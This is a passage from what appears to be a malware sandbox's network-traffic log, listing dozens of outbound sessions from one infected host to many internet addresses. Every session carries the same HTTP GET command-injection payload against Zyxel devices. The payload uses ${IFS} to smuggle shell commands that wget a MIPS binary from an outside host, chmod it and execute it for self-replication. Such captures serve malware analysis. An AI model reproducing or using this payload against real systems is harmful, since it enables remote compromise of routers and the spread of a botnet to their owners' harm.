                                            Jan 14, 2024 15:50:53.691637993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8156192.168.2.2350766175.119.184.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.691660881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8157192.168.2.233909482.30.62.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.691689968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8158192.168.2.236042413.149.232.227443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.691720009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8159192.168.2.2337098119.218.172.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.691767931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8160192.168.2.233642886.83.28.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.691808939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8161192.168.2.2342440223.55.96.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.691838026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8162192.168.2.2357246175.212.202.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.691838026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8163192.168.2.233625674.108.17.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.691840887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8164192.168.2.2337622148.10.131.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.691895008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8165192.168.2.2356494109.116.151.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.691920042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8166192.168.2.2349474178.42.23.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.691935062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8167192.168.2.2334432166.67.194.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.692040920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8168192.168.2.2343854196.25.175.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.692071915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8169192.168.2.233660632.2.77.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.692085028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8170192.168.2.2337452178.192.185.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.692116022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8171192.168.2.2340320102.31.15.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.692152023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8172192.168.2.234946044.49.248.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.692213058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8173192.168.2.2346490186.107.2.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.692235947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8174192.168.2.2347048128.191.43.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.692280054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8175192.168.2.2347200190.129.216.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.692296982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8176192.168.2.2337342107.157.5.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.692306995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8177192.168.2.2340012155.197.36.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.692346096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8178192.168.2.235452669.22.116.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.692370892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8179192.168.2.2360704118.86.189.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.692408085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8180192.168.2.233449487.101.249.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.692461967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8181192.168.2.2356846131.89.224.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.692482948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8182192.168.2.234424447.111.245.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.692534924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8183192.168.2.2344140121.222.84.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.692562103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8184192.168.2.2341812142.132.188.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.692589998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8185192.168.2.2351162160.232.178.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.692655087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8186192.168.2.2334156191.46.64.49443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.692667961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8187192.168.2.2360218185.90.189.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.692699909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8188192.168.2.233497446.68.11.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.692744017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8189192.168.2.234566464.88.66.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.692753077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8190192.168.2.2352024152.215.4.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.692775965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8191192.168.2.2352518213.81.110.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.692854881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8192192.168.2.2350666186.179.186.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.693989038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8193192.168.2.2337718194.164.230.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.694071054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8194192.168.2.2358852157.166.237.115443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.694108009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8195192.168.2.2338048103.107.110.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.694160938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8196192.168.2.234750044.102.26.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.694185019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8197192.168.2.2352838144.227.247.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.694196939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8198192.168.2.2350564204.168.251.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.694850922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8199192.168.2.233612635.237.16.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.695854902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8200192.168.2.233429474.42.60.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.695904970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8201192.168.2.2353622211.159.77.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.695905924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8202192.168.2.235874024.199.104.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.695930958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8203192.168.2.2336222115.214.197.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.695981979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8204192.168.2.2345144165.51.213.10443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696001053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8205192.168.2.233862024.164.26.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696001053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8206192.168.2.234808254.107.106.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696029902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8207192.168.2.2357882203.150.13.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696053982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8208192.168.2.2346664147.208.25.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696095943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8209192.168.2.234799079.232.231.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696135998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8210192.168.2.23363429.251.148.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696151972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8211192.168.2.234349824.149.8.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696166992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8212192.168.2.234222840.141.151.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696192026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8213192.168.2.234537881.225.200.119443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696235895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8214192.168.2.2360536154.5.186.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696265936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8215192.168.2.2333984188.29.6.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696297884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8216192.168.2.2348090144.5.179.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696321011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8217192.168.2.234620299.184.183.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696342945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8218192.168.2.2347730207.164.41.173443
                                            TimestampBytes transferredDirectionData
